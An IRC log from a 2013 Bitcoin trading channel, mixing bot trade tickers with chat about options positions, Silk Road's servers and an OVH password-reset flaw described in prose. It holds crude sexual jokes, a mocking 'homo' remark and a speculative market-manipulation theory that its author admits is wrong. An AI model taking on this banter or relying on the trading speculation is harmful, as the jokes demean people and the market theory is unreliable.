strip bar Apr 30 06:59:48 http://www.youtube.com/watch?v=TBkYdUgl3-M&feature=player_embedded Apr 30 07:00:16 mircea is yes homo Apr 30 07:00:29 mircea_popescu: I will go to a mall, and promise 18 year olds louis vatton bags in exchange for me introducing them to mircea_popescu Apr 30 07:01:02 doesn't take a solution like MPEX to get da ladiez Apr 30 07:01:37 they have malls in romania? Apr 30 07:01:50 i figured romania was like a walmart parking lot Apr 30 07:02:12 Vat on! Apr 30 07:02:13 with the rich elite having RVs parked there for weeks Apr 30 07:02:47 [BTCTC] [BASIC-MINING] 2 @ 0.428 = 0.856 BTC [+] Apr 30 07:08:32 http://www.google.com/trends/explore?hl=en-US#q=%22bitcoin%22 Apr 30 07:11:42 not too big in nigeria Apr 30 07:17:24 waa Apr 30 07:19:47 ;;seen mircea_popescu Apr 30 07:19:47 mircea_popescu was last seen in #bitcoin-assets 11 minutes and 14 seconds ago: http://www.google.com/trends/explore?hl=en-US#q=%22bitcoin%22 Apr 30 07:22:32 http://24.media.tumblr.com/tumblr_ly2167CprO1rnabkso1_1280.jpg Apr 30 07:30:31 http://www.google.com/trends/explore?hl=en-US#q=%22bitcoin%22%2C%20obama&cmpt=q Apr 30 07:30:34 soon we'll cross obama. Apr 30 07:36:32 he can go to hell Apr 30 07:37:37 and he is a degenerate Apr 30 07:37:52 thats all. Apr 30 07:37:58 for now. **** BEGIN LOGGING AT Tue Apr 30 17:07:00 2013 Apr 30 17:07:54 "I dont know if something like this has been talked about but im sure it has crossed peoples minds. Apr 30 17:07:54 Why doesnt someone open an online bitcoin bank? It could have a nice online interface" Apr 30 17:08:04 thestringpuller totally. a nice interface. Apr 30 17:08:20 it would be a website that's a bank and has a nice interface. whatcouldpossibly.pdf Apr 30 17:08:53 we could call it blockchain.info Apr 30 17:09:36 [MPEX] [O.USD.C143T] 1000 @ 0.15528424 = 155.2842 BTC [-] Apr 30 17:09:42 o hey. Apr 30 17:09:52 $avg ^oix Apr 30 17:10:25 hm what was it Apr 30 17:10:30 or we could call it mpex Apr 30 17:10:33 $price ^oix Apr 30 17:10:38 da fuck Apr 30 17:10:43 !ticker m ^OIX Apr 30 17:10:44 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 59.0473661 / 191.28391806 / 197.76214913 (639 shares, 153.26 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 30 17:10:53 $avg Apr 30 17:10:54 ThickAsThieves: 142.03 Apr 30 17:11:03 jborkl no because interface. Apr 30 17:11:15 oh, I like the interface Apr 30 17:11:22 very simple Apr 30 17:11:24 $vwap ^oix Apr 30 17:11:25 mircea_popescu: ^OIX 1 day: no data 7 day: average: 191.28391806 high: 197.76214913 low: 59.0473661 volume: 639 btc: 153.26152721 30 day: no data Apr 30 17:11:39 jborkl it's not nice! stop trolling da reddit folk! you're a jerk! Apr 30 17:11:56 How does the bot handle options it buys? Does it ever excercise, or try to resell? If it excercises, does it wait for a certain % of profit? Apr 30 17:11:58 I missed something here, lol Apr 30 17:12:12 [MPEX] [O.USD.P320T] 1000 @ 1.25680427 = 1256.8043 BTC [+] Apr 30 17:12:13 my sarcasm :D Apr 30 17:12:25 whoa nelly. Apr 30 17:12:31 thats the 4th sell Apr 30 17:12:36 what srsly ? Apr 30 17:12:49 hey, somebody Apr 30 17:12:53 's taking some serious positions. Apr 30 17:13:07 ThickAsThieves the bot always tries to resell. that's why it always quotes both ends. Apr 30 17:13:12 it sometimes exercises. Apr 30 17:13:43 so couldnt the bot just excercise these new puts and close this guys position Apr 30 17:13:51 it could, yes. Apr 30 17:13:55 odd Apr 30 17:14:06 why ? Apr 30 17:14:30 ;;netstat Apr 30 17:14:31 Error: "netstat" is not a valid command. Apr 30 17:14:33 odd that he would sell those puts Apr 30 17:14:38 not odd that the bit would ex Apr 30 17:14:39 mostly put - this month put 320,s Apr 30 17:14:41 bot* Apr 30 17:14:48 [09:52] <@assbot> [MPEX] [O.USD.P320T] 1000 @ 1.25537321 = 1255.3732 BTC Apr 30 17:14:48 [09:56] <@assbot> [MPEX] [O.USD.P320T] 1000 @ 1.25521432 = 1255.2143 BTC [-] Apr 30 17:14:48 [10:05] <@assbot> [MPEX] [O.USD.P320T] 1000 @ 1.25457896 = 1254.579 BTC [-] Apr 30 17:14:48 [10:11] <@assbot> [MPEX] [O.USD.P320T] 1000 @ 1.25680427 = 1256.8043 BTC [+] Apr 30 17:14:51 those are the max Apr 30 17:15:14 [MPEX] [O.USD.C143T] 1000 @ 0.1543468 = 154.3468 BTC [-] Apr 30 17:15:29 hm Apr 30 17:15:33 those are already in the money right? Apr 30 17:15:41 ;;calc 320 / 2.255 Apr 30 17:15:41 141.906873614 Apr 30 17:15:45 so why sell those puts to the bot Apr 30 17:15:48 whoa look at this! Apr 30 17:16:02 so sold puts short, their break even is ~142, so also sold calls short at 143 Apr 30 17:16:14 basically this is an insured long play. Apr 30 17:16:25 $vwap O.USD.P320T Apr 30 17:16:26 mircea_popescu: O.USD.P320T 1 day: average: 1.25549269 high: 1.25680427 low: 1.25457896 volume: 4000 btc: 5021.97076 7 day: average: 1.25549269 high: 1.25680427 low: 1.25457896 volume: 4000 btc: 5021.97076 30 day: average: 1.25549269 high: 1.25680427 low: 1.25457896 volume: 4000 btc: 5021.97076 Apr 30 17:16:39 $vwap O.USD.C143T Apr 30 17:16:41 mircea_popescu: O.USD.C143T 1 day: average: 0.15481552 high: 0.15528424 low: 0.1543468 volume: 2000 btc: 309.63104 7 day: average: 0.15481552 high: 0.15528424 low: 0.1543468 volume: 2000 btc: 309.63104 30 day: average: 0.18907858 high: 0.275176 low: 0.1543468 volume: 5375 btc: 1016.2973877 Apr 30 17:16:55 heh. i bet you there's two more sets of 143 on the pipe. Apr 30 17:16:58 this months 143c price is only .15? Apr 30 17:17:05 no Apr 30 17:17:09 thats someone selling to bot Apr 30 17:17:14 jborkl bid side. Apr 30 17:17:15 oh yeah, nm Apr 30 17:17:40 so basically if price stays over 143 makes money on the puts, if goes a little under makes money on the calls to somewhat compensate. Apr 30 17:18:12 except that bot could close him before he does Apr 30 17:18:19 [MPEX] [O.USD.C143T] 1000 @ 0.15465646 = 154.6565 BTC [+] Apr 30 17:18:29 yeah. Apr 30 17:18:57 whiplash can be a serious problem for this position, so i guess it implicitly is a bet against whiplash Apr 30 17:19:22 course... the bot could be closing him the other way too, ie, to protect itself. and since whiplash can go both ways Apr 30 17:19:32 i suppose technically it's a bet that the bot closes correctly. Apr 30 17:19:53 for an unspecified value of "correctly" Apr 30 17:20:24 i shoulda out bid the bot for the calls if i wanted some Apr 30 17:20:28 :/ Apr 30 17:20:47 the golden rule of mpex is "it always pays to have positions in the book" Apr 30 17:20:52 as the veterans can tell you. Apr 30 17:21:14 derp Apr 30 17:21:27 [MPEX] [O.USD.C143T] 100 @ 0.15465646 = 15.4656 BTC [+] Apr 30 17:21:35 there Apr 30 17:21:36 :) Apr 30 17:23:05 http://www.ftc.gov/opa/2013/02/path.shtm Apr 30 17:24:44 http://bitbet.us/bet/439/bitcoin-bigger-/ Apr 30 17:24:47 haha check out this one Apr 30 17:27:04 it it clear what the puts were opened for now Apr 30 17:27:36 thats a big dump Apr 30 17:28:11 [MPEX] [O.USD.C143T] 48 @ 0.152 = 7.296 BTC [-] Apr 30 17:28:13 [MPEX] [O.USD.C143T] 852 @ 0.14277256 = 121.6422 BTC [-] Apr 30 17:28:34 [MPEX] [S.BBET] 35000 @ 0.00100005 = 35.0018 BTC [-] Apr 30 17:28:35 well then Apr 30 17:28:36 [MPEX] [S.BBET] 10 @ 0.001 = 0.01 BTC [-] Apr 30 17:28:41 [MPEX] [S.BBET] 2000 @ 0.00099999 = 2 BTC [-] Apr 30 17:28:46 [MPEX] [S.BBET] 100 @ 0.00199994 = 0.2 BTC [+] Apr 30 17:30:08 SR is shut down Apr 30 17:30:14 somewhat temporarily Apr 30 17:30:44 o ? Apr 30 17:30:45 ;;goxlag Apr 30 17:30:52 MtGox lag is 56.21932 seconds. During this time, light travels 0.112662887817 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 30 17:31:11 apparently site is under attack Apr 30 17:31:23 and tor cant protect it without a change Apr 30 17:31:49 every1 on BlackMarketreload :) Apr 30 17:32:03 [HAVELOCK] [SDICE] 2 @ 0.33479993 = 0.6696 BTC [+] Apr 30 17:32:16 selling all those puts doesnt fit with this big dump though, right? Apr 30 17:33:32 ;;ticker Apr 30 17:33:33 BTCUSD ticker | Best bid: 139.12000, Best ask: 140.75000, Bid-ask spread: 1.63000, Last trade: 140.75000, 24 hour volume: 44073.82016531, 24 hour low: 137.45000, 24 hour high: 146.93000, 24 hour vwap: 143.02747 Apr 30 17:33:38 heh. not rly. Apr 30 17:35:28 I think I have it figured out, and it is pretty damn smart. If not, I am going to do it Apr 30 17:35:53 jborkl do what ? Apr 30 17:36:21 What I think they are doing .. Apr 30 17:37:14 [10:34] I think I have it figured out, and it is pretty damn smart. If not, I am going to do it <--- so if it's dumb you're gonna join in? Apr 30 17:37:32 lemme see Apr 30 17:37:35 the sell the puts Apr 30 17:37:39 buy calls Apr 30 17:37:43 dump the btc Apr 30 17:37:47 nah cause sold both Apr 30 17:37:52 ah Apr 30 17:38:56 is the goal to stabilize the price? Apr 30 17:39:59 if selling both, he wants neother to be profitable for the buyer Apr 30 17:40:13 neither* Apr 30 17:40:24 is that a safe assumption? Apr 30 17:40:29 ;;bcstats Apr 30 17:40:32 Current Blocks: 233918 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1953 blocks | Next Difficulty In About: 1 week, 5 days, 4 hours, 57 minutes, and 0 seconds | Next Difficulty Estimate: 10612270.0477 | Estimated Percent Change: 5.31919 Apr 30 17:40:51 nanotube ^ E7 :D Apr 30 17:41:15 ThickAsThieves i would imagine his thinking is that price is going up, so sold the puts, and in the case it goes a little under has the calls to pay him Apr 30 17:42:05 so the dump is coincidence? Apr 30 17:42:44 well probably. Apr 30 17:42:49 for that matter, the puts/calls could be coincidence Apr 30 17:42:54 ie, two diff people doing it at the same time Apr 30 17:44:28 too many coincidences in that case, imo Apr 30 17:44:58 i think in the future bitcoin will make THE BEST detective/mystery stories Apr 30 17:45:03 not that superstition is the best financial strategy Apr 30 17:45:47 i'm just glad i got some affordable calls Apr 30 17:46:04 probly a sign that i'm the sucker in the room... Apr 30 17:47:03 [HAVELOCK] [HIM] 1 @ 1.8999 BTC [+] Apr 30 17:47:07 $depth O.USD.C143T Apr 30 17:47:08 mircea_popescu: O.USD.C143T Bids: ['400 @ 0.155', '1000 @ 0.14212607', '1000 @ 0.14212607'] Apr 30 17:47:09 mircea_popescu: Asks: ['1000 @ 0.30647073', '1000 @ 0.30647073'] Apr 30 17:47:16 i dunno, everyone seems to want them Apr 30 17:48:28 FF Apr 30 17:48:58 (fast fingers) Apr 30 17:50:16 what kind of collateral is need to write puts like that Apr 30 17:50:30 or is it done by peeps with credit accounts Apr 30 17:54:05 thousands of btc and who knows, maybe. Apr 30 17:56:03 [HAVELOCK] [HIM] 10 @ 1.8601 = 18.601 BTC [-] Apr 30 18:02:58 [MPEX] [S.DICE] 350 @ 0.00319322 = 1.1176 BTC [-] Apr 30 18:07:34 i assume more btc was paid to the seller, than the amount he has up for collateral? Apr 30 18:08:32 my idea is that the moves dont have so much to do with price movement, as accumulating more total btc Apr 30 18:09:18 [BTCTC] [ASICMINER-PT] 1 @ 1.274 BTC [-] Apr 30 18:09:26 [BTCTC] [ASICMINER-PT] 1 @ 1.2701 BTC [-] Apr 30 18:12:41 okay, suppose the actor actually represents a great majority of the highest 5000btc of the bid book on Gox. Couldn't he sell those puts, dump 5000btc into mostly his own bids, driving price lower so he can now buy more btc at the new lower price? As long as he doesnt sell so low that he triggers the bot to excercise, he would be leveraging the btc to get more btc Apr 30 18:14:07 mircea_popescu how do you write so quickly Apr 30 18:14:13 [MPEX] [S.MPOE] 2400 @ 0.000725 = 1.74 BTC [-] Apr 30 18:14:16 you write like a research paper worth of words a week Apr 30 18:14:21 this theory is obv half-baked, just thinking out loud Apr 30 18:15:22 ThickAsThieves: it's reasonable but the issue is the puts Apr 30 18:15:26 right? Apr 30 18:15:36 only if price drops too low Apr 30 18:15:52 yea but even then you can get whiplash like mircea indicated Apr 30 18:16:03 [HAVELOCK] [KCIM] 1 @ 1.4689 BTC [+] Apr 30 18:16:14 maybe that depends on how large of a manipulator the actor really is Apr 30 18:16:40 if they can deal in 5000btc of puts, odds are they are a pretty big deal Apr 30 18:19:05 i think you underestimate the sensitive of the market panicking during "moves" Apr 30 18:19:10 there are other holes in my theory though Apr 30 18:19:13 sensitivity* Apr 30 18:19:21 like why fluff the bid book in this case Apr 30 18:19:28 thestringpuller i have a spare pair of hands Apr 30 18:19:41 i assume more btc was paid to the seller, than the amount he has up for collateral? << now what sense does this make !? Apr 30 18:20:03 none if i'm wrong Apr 30 18:20:17 mircea_popescu: so you have four arms to finger four girls simultaneously Apr 30 18:20:20 but the collateral you post is ALWAYS going to be more than what you get selling. Apr 30 18:20:25 thestringpuller totally :D Apr 30 18:20:46 but yes, i'm an intellectual. we write. Apr 30 18:20:58 but some actors have credit accounts no? Apr 30 18:20:59 we read, we write, we process information. modern day mentats. Apr 30 18:21:07 ThickAsThieves yeah. Apr 30 18:21:17 I try to write, but it's difficult to care. Apr 30 18:21:17 so in that case collateral is nil Apr 30 18:21:38 well, if you withdraw from a margined account it goes to cover margin first. Apr 30 18:21:43 [BTCTC] [ASICMINER-PT] 1 @ 1.289 BTC [+] Apr 30 18:21:46 in the sense it's difficult to find the right words Apr 30 18:21:46 ah Apr 30 18:21:47 [BTCTC] [ASICMINER-PT] 1 @ 1.271 BTC [-] Apr 30 18:21:50 [BTCTC] [ASICMINER-PT] 1 @ 1.2701 BTC [-] Apr 30 18:22:08 dude I think we're gonna see a bear assembly soon Apr 30 18:22:17 ;;market sell 10000 Apr 30 18:22:17 A market order to sell 10000 bitcoins right now would net 1351903.9426 USD and would take the last price down to 132.0000 USD, resulting in an average price of 135.1904 USD/BTC. | Data vintage: 22.9025 seconds Apr 30 18:22:19 like why fluff the bid book in this case << what's that mean ? Apr 30 18:22:29 ;;market sell 20000 Apr 30 18:22:29 A market order to sell 20000 bitcoins right now would net 2637090.8720 USD and would take the last price down to 125.1100 USD, resulting in an average price of 131.8545 USD/BTC. | Data vintage: 34.7641 seconds Apr 30 18:22:38 ;;market sell 30000 Apr 30 18:22:38 A market order to sell 30000 bitcoins right now would net 3865234.4410 USD and would take the last price down to 121.1000 USD, resulting in an average price of 128.8411 USD/BTC. | Data vintage: 44.3863 seconds Apr 30 18:22:41 dont worry, your answers make my theory totally wrong Apr 30 18:23:17 kakobrekla https://bitcointalk.org/index.php?topic=188735.msg1985011#msg1985011 epic man. Apr 30 18:23:21 just... epic. Apr 30 18:23:30 :P Apr 30 18:24:15 also thestringpuller, you can finger two girls with one hand Apr 30 18:24:49 fingerbangonomics Apr 30 18:24:52 I've tried too hard. Apr 30 18:29:35 !ticker m ^OIX Apr 30 18:29:36 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 59.0473661 / 191.28391806 / 197.76214913 (639 shares, 153.26 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 30 18:33:42 [BTCTC] [S.MPOE-PT] 24 @ 0.000679 = 0.0163 BTC [+] Apr 30 18:33:53 [BTCTC] [RSM] 8 @ 0.0051 = 0.0408 BTC [+] Apr 30 18:36:29 https://bitcointalk.org/index.php?topic=187730.0;all Apr 30 18:36:34 i find it incredible how much time this person has. Apr 30 18:37:30 me too Apr 30 18:37:43 i gave up following the whole usagi thing Apr 30 18:38:13 anything that takes that much explaining can't be good Apr 30 18:38:48 absolutely. Apr 30 18:41:07 all that for 100 oz of silver? so 16 btc market cap :/ Apr 30 18:46:10 tyeah Apr 30 18:46:27 people somehow miss on this. options trade on mpex today ? 10k btc or w/e Apr 30 18:46:36 usagi silve fund total nominal value ? 16 btc. Apr 30 18:46:44 ;;calc 10000/16 Apr 30 18:46:44 625 Apr 30 18:46:51 takes 625 usagis a day. Apr 30 18:47:34 http://jcph.am/2013/04/30/tuesday-music-trio/ Apr 30 18:47:43 listen to some music and forget about bitcoin Apr 30 18:47:48 especially the third one Apr 30 18:47:54 there's three bitcoins ? Apr 30 18:47:56 truffles, no one had to justify bitocin to me Apr 30 18:48:08 yes only three bitcoins left Apr 30 18:48:14 act now. limite supplies. Apr 30 18:49:33 not what i said Apr 30 18:49:35 also, context Apr 30 18:49:36 that's a lot of usagis Apr 30 18:50:29 english is not my first language Apr 30 18:50:34 what srsly ?! Apr 30 18:50:48 kidding Apr 30 18:50:50 numa numa was just on the radio Apr 30 18:51:02 requested for mp Apr 30 18:51:51 lol Apr 30 18:52:04 [HAVELOCK] [HIM] 4 @ 1.8601 = 7.4404 BTC [-] Apr 30 19:06:23 no worries, i know i can be a little loose with my words Apr 30 19:09:04 [MPEX] [S.MPOE] 7149 @ 0.000725 = 5.183 BTC [-] Apr 30 19:12:00 http://trilema.com/2013/why-finance-shouldnt-be-open-to-your-average-schmoe/ Apr 30 19:19:53 I just went to BTCjam , never go there Apr 30 19:20:03 filter by otc - no listings Apr 30 19:25:51 what about the gox listings? Apr 30 19:26:04 not that I think this is a good idea Apr 30 19:31:03 [HAVELOCK] [SDICE] 1 @ 0.321 BTC [-] Apr 30 19:34:53 [MPEX] [O.USD.C143T] 5 @ 0.30452304 = 1.5226 BTC [+] Apr 30 19:37:29 [BTCTC] [ASICMINER-PT] 1 @ 1.24061 BTC [-] Apr 30 19:37:38 [BTCTC] [ASICMINER-PT] 1 @ 1.2406 BTC [-] Apr 30 19:37:47 [BTCTC] [ASICMINER-PT] 1 @ 1.231021 BTC [-] Apr 30 19:37:51 [BTCTC] [ASICMINER-PT] 5 @ 1.23102 = 6.1551 BTC [-] Apr 30 19:38:00 [BTCTC] [ASICMINER-PT] 3 @ 1.23091 = 3.6927 BTC [-] Apr 30 19:38:04 [BTCTC] [ASICMINER-PT] 1 @ 1.2255 BTC [-] Apr 30 19:38:13 [BTCTC] [ASICMINER-PT] 8 @ 1.2254 = 9.8032 BTC [-] Apr 30 19:38:22 [BTCTC] [ASICMINER-PT] 2 @ 1.225325 = 2.4507 BTC [-] Apr 30 19:38:30 [BTCTC] [ASICMINER-PT] 2 @ 1.22523 = 2.4505 BTC [-] Apr 30 19:38:33 [BTCTC] [ASICMINER-PT] 1 @ 1.225 BTC [-] Apr 30 19:38:37 [BTCTC] [ASICMINER-PT] 2 @ 1.217 = 2.434 BTC [-] Apr 30 19:38:45 [BTCTC] [ASICMINER-PT] 1 @ 1.216957 BTC [-] Apr 30 19:39:03 [HAVELOCK] [VTX] 1 @ 0.471 BTC [+] Apr 30 19:39:05 [HAVELOCK] [VTX] 1 @ 0.471699 BTC [+] Apr 30 19:39:07 [BTCTC] [ASICMINER-PT] 1 @ 1.216957 BTC [-] Apr 30 19:48:10 [BTCTC] [ASICMINER-PT] 1 @ 1.24001 BTC [+] Apr 30 19:48:14 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] Apr 30 19:50:18 [MPEX] [O.USD.P143T] 2 @ 0.49662084 = 0.9932 BTC [-] Apr 30 19:51:32 [MPEX] [S.BBET] 15000 @ 0.00100005 = 15.0008 BTC [-] Apr 30 19:51:49 [MPEX] [S.BBET] 100 @ 0.00199994 = 0.2 BTC [+] Apr 30 19:53:45 [BTCTC] [ASICMINER-PT] 1 @ 1.24999 BTC [+] Apr 30 19:56:57 27s Litecoin followed you 49s Devcoin followed you 1m Namecoin followed you 1m Apr 30 19:56:57 PPCoins followed you 1m Bitcoin followed you Apr 30 19:56:58 da fuck Apr 30 20:00:29 you forgot about feathercoins, the latest craze Apr 30 20:03:28 well they forgot about me Apr 30 20:03:33 i just got massfollowed by all the coinz Apr 30 20:06:02 too many coins, its a problem Apr 30 20:10:07 matonis linked this forbes article full of DPR quotes Apr 30 20:10:19 i've been readinf or some time now Apr 30 20:11:37 http://www.forbes.com/sites/andygreenberg/2013/04/29/collected-quotations-of-the-dread-pirate-roberts-founder-of-the-drug-site-silk-road-and-radical-libertarian/3/ Apr 30 20:11:57 there's a lot. he reads half adult/half child Apr 30 20:12:01 like peter pan Apr 30 20:13:12 i saw some this morn in my digest Apr 30 20:13:17 wasn't too impressed. Apr 30 20:15:06 i'm not going to be surprised to find out SR is run by a kid Apr 30 20:15:12 if/when that day comes Apr 30 20:15:44 like 16 ? yeah. Apr 30 20:17:36 well, SR used to run a mysqld with debugging mode enabled, so each time there was a DB error (and there were quite a few), users would get a specimen of the system's internals. Apr 30 20:17:36 the internals seemed like a default LAMP stack to me. but afaik this has changed. well if they're a kid, they are surely learning to scale their infrastructure/business etc. :) Apr 30 20:17:54 death is a downside cost of war? i thought it was a cheap way to get rid of excessively violent youths... Apr 30 20:18:29 heh. Apr 30 20:18:43 @ lamp stack Apr 30 20:18:49 but yeah, the agorist sentiments are at a relatively naive level if i may say so. but hey.. :) Apr 30 20:19:07 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1602 = 0.6408 BTC [-] Apr 30 20:19:10 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1601 = 0.8005 BTC [-] Apr 30 20:19:13 [BTCTC] [CRYPTO-TRADE] 3 @ 0.16 = 0.48 BTC [-] Apr 30 20:19:17 yeah, i'm quite sure that at least it used to be apache + mysql + php, probably with default configs on a default ubuntu or sth. :) Apr 30 20:19:52 how many times has sr been hacked? Apr 30 20:20:49 i only recall one (really) major security breach, pwd / pwd hashes stolen etc. it was a long time ago, probably in its LAMP infancy days Apr 30 20:21:00 they hired folks to harden security / rewrite things Apr 30 20:21:29 http://nashx.com/About Apr 30 20:21:34 looks more interesting Apr 30 20:24:44 [MPEX] [S.MPOE] 9450 @ 0.000725 = 6.8513 BTC [-] Apr 30 20:25:17 nice one Apr 30 20:25:17 "The amount you risk should be twice the amount you're trading in order to keep the deal in Nash equilibrium." Apr 30 20:25:17 coolcool, actually looks interesting / i get the idea Apr 30 20:32:47 [BTCTC] [COGNITIVE] 7 @ 0.1991 = 1.3937 BTC [+] Apr 30 20:36:25 he was here a fewe days ago discussing it. Apr 30 20:36:44 ;;eauth mircea_popescu Apr 30 20:36:44 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Apr 30 20:37:10 ;;everify freenode:#bitcoin-otc:0d7b2025f98ee246e08189ba63da58a91aa92dc3142a56e80c32a778 Apr 30 20:37:11 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Apr 30 20:37:22 ;;rate Girlfawkesy 1 my btc-e broker. Apr 30 20:37:23 Rating entry successful. Your rating of 1 for user Girlfawkesy has been recorded. Apr 30 20:38:24 http://pastebin.com/skGagP0X Apr 30 20:38:33 something about OVH and bitcoin site Apr 30 20:38:41 and brute forcing a password function Apr 30 20:39:12 ;;later tell davout you seen http://pastebin.com/skGagP0X ? Apr 30 20:39:13 The operation succeeded. Apr 30 20:40:07 looks pretty big Apr 30 20:40:35 yah Apr 30 20:41:35 [MPEX] [S.MPOE] 31498 @ 0.000725 = 22.8361 BTC [-] Apr 30 20:41:37 [MPEX] [S.MPOE] 12350 @ 0.00072153 = 8.9109 BTC [-] Apr 30 20:41:45 [MPEX] [S.MPOE] 2137 @ 0.00072 = 1.5386 BTC [-] Apr 30 20:41:55 haha mp i'm sur davout saw that :) Apr 30 20:42:19 error4733 i think it's likely too, but you know, just in case. Apr 30 20:42:29 if he didn't and nobody said anything cause sure he did... sucks to be him lol Apr 30 20:42:45 https://news.ycombinator.com/item?id=5632479 Apr 30 20:43:01 http://forums.ovh.net/showthread.php?p=548183 Apr 30 20:43:49 !ticker m s.dice Apr 30 20:43:51 [MPEX:S.DICE] 1D: 0.00315598 / 0.0032441 / 0.00343999 (6603 shares, 21.42 BTC), 7D: 0.0023263 / 0.00295439 / 0.00349938 (39083 shares, 115.47 BTC), 30D: 0.0012 / 0.00311033 / 0.00439999 (940537 shares, 2,925.39 BTC) Apr 30 20:44:00 !ticker h sdice Apr 30 20:44:01 [HAVELOCK:SDICE] 1D: 0.32000000 / 0.322025 / 0.33480000 (40 shares, 12.88099987 BTC), 7D: 0.27500001 / 0.30852573 / 0.33480000 (633 shares, 195.29678962 BTC), 30D: 0.12500000 / 0.31325339 / 0.44969999 (6343 shares, 1986.96624734 BTC) Apr 30 20:45:43 TL;DR: Here's what happened. When a password reset is submitted, the user receives a random URL by email containing a random 21 letter string. The algorithm used was bad, so the random string could be brut-forced. Apr 30 20:45:43 The OVH team researched 3 years of password changelogs and found 3 customers who had been brute-forced that way, all in the "bitcoin community" Apr 30 20:45:52 sorry i wanted to make sense of what i read Apr 30 20:47:05 yeah Apr 30 20:47:29 because the bitcoin community typically has the maturity of a 12 y/o Apr 30 20:47:44 "Here, hold all of my precious" Apr 30 20:47:45 no, because the btc community has more money than all the internet combined. Apr 30 20:47:53 these cloud hoster will continually be infiltrated Apr 30 20:47:59 *hosters Apr 30 20:48:14 most likely that isn't going away Apr 30 20:48:30 yea Apr 30 20:48:30 anytime you put something in the cloud, you're risking it Apr 30 20:48:31 run a bitcoin based business on some rented platform -> get hacked Apr 30 20:48:39 there's something to be said about physical security Apr 30 20:48:49 in this world, yes Apr 30 20:48:49 the minute you give that up.. you'll be hosed Apr 30 20:48:54 for sure Apr 30 20:48:54 its just a matter of time Apr 30 20:58:58 We have been in contact with these clients but the quality of our exchanges did not allow us to get enough information that would help reveal an vulnerability on our side. Our developpers have in a completely independant way found the issue mentionned above, and only then have we realised that there was a link between our flaw and these 3 customers. We certainly have something to learn here about the best way to ensure Apr 30 20:58:58 dialog with clients about this kind of issue. Apr 30 20:59:03 this is some decent pr ovh has going. Apr 30 21:00:20 [BTCTC] [PAJKA.BOND] 9 @ 0.1 = 0.9 BTC [-] Apr 30 21:00:55 ovh is typically not really good with client communication (personal limited experience) Apr 30 21:02:26 all that said, there's no guarantee that owning your own boxes gets you anything Apr 30 21:03:16 more generally, there's no guarantee. Apr 30 21:03:21 also on the long term we're all hosed Apr 30 21:03:23 in the burial way. Apr 30 21:03:57 so have some damn fun! Apr 30 21:04:46 in the entropy way, too.. Apr 30 21:04:47 benkay: sure, unless you / or your hire really know(s) what you/they're doing. running bitcoind under multiple layers of virtualization/isolation (e.g. bsd jails + virtualbox + chroot) is a start Apr 30 21:06:29 at the very least, that way you at least may attempt to evaluate your risks, possible attack vectors etc. not with cloud hosting / whatever - parts of the hosting infrastructure remain hidden from the client (or their implementations). which generally sucks when somebody discovers that times have changed and some of those hosted machines are now storing highly valuable assets Apr 30 21:07:41 if you're going to run bitcoind on a $30 Kimsufi rented server with root password reset capabilities in your 'customer control panel', you're gonna have a hard time Apr 30 21:10:25 [BTCTC] [ASICMINER-PT] 7 @ 1.25396 = 8.7777 BTC [+] Apr 30 21:15:55 [MPEX] [S.MPOE] 4815 @ 0.00071954 = 3.4646 BTC [-] Apr 30 21:15:57 [MPEX] [S.MPOE] 2650 @ 0.00072491 = 1.921 BTC [+] Apr 30 21:16:05 [MPEX] [S.MPOE] 9035 @ 0.00072623 = 6.5615 BTC [+] Apr 30 21:18:58 lol this is madness today compared to lately Apr 30 21:19:39 what's the madness, KRS-1? Apr 30 21:20:39 http://www.youtube.com/watch?v=CvPdgkD5LA8 lol Apr 30 21:22:28 [BTCTC] [ASICMINER-PT] 1 @ 1.25398 BTC [+] Apr 30 21:22:54 [BTCTC] [ASICMINER-PT] 1 @ 1.25398 BTC [+] Apr 30 21:24:35 [MPEX] [S.MPOE] 15531 @ 0.00072623 = 11.2791 BTC [+] Apr 30 21:29:14 oh just saying how the buy/sell order volume is there but then pulled back and then there again Apr 30 21:29:34 its been pretty quiet til today, a bit more movement..maybe madness was overdoing it a bit Apr 30 21:29:38 ;;ticker Apr 30 21:29:41 BTCUSD ticker | Best bid: 136.88697, Best ask: 137.12099, Bid-ask spread: 0.23402, Last trade: 137.12100, 24 hour volume: 53204.21184346, 24 hour low: 136.00000, 24 hour high: 146.93000, 24 hour vwap: 141.41656 Apr 30 21:31:04 This is a pretty good song Apr 30 21:31:20 Is that one dude in the background you? Apr 30 21:31:38 lol Apr 30 21:33:40 what's causing the drop? Apr 30 21:35:16 I feel like the bondholders saw the puts that were sold to the bot and dropped the price... Apr 30 21:35:22 CONSPIRACY Apr 30 21:36:15 lol Apr 30 21:38:24 [BTCTC] [ASICMINER-PT] 1 @ 1.25399 BTC [+] Apr 30 21:38:28 [BTCTC] [ASICMINER-PT] 5 @ 1.254 = 6.27 BTC [+] Apr 30 21:38:35 ;;ticker Apr 30 21:38:35 BTCUSD ticker | Best bid: 135.31001, Best ask: 135.40000, Bid-ask spread: 0.08999, Last trade: 135.40000, 24 hour volume: 54369.04427953, 24 hour low: 135.48000, 24 hour high: 146.93000, 24 hour vwap: 141.29665 Apr 30 21:38:38 [BTCTC] [ASICMINER-PT] 10 @ 1.255 = 12.55 BTC [+] Apr 30 21:38:43 [BTCTC] [ASICMINER-PT] 20 @ 1.259999 = 25.2 BTC [+] Apr 30 21:38:47 [BTCTC] [ASICMINER-PT] 2 @ 1.26985 = 2.5397 BTC [+] Apr 30 21:38:57 tiberiusiv: what do you even do in bitcoinland Apr 30 21:38:59 [BTCTC] [ASICMINER-PT] 7 @ 1.27 = 8.89 BTC [+] Apr 30 21:39:17 [BTCTC] [ASICMINER-PT] 2 @ 1.27195 = 2.5439 BTC [+] Apr 30 21:39:27 so you do nothing? Apr 30 21:39:30 COOL Apr 30 21:39:33 [BTCTC] 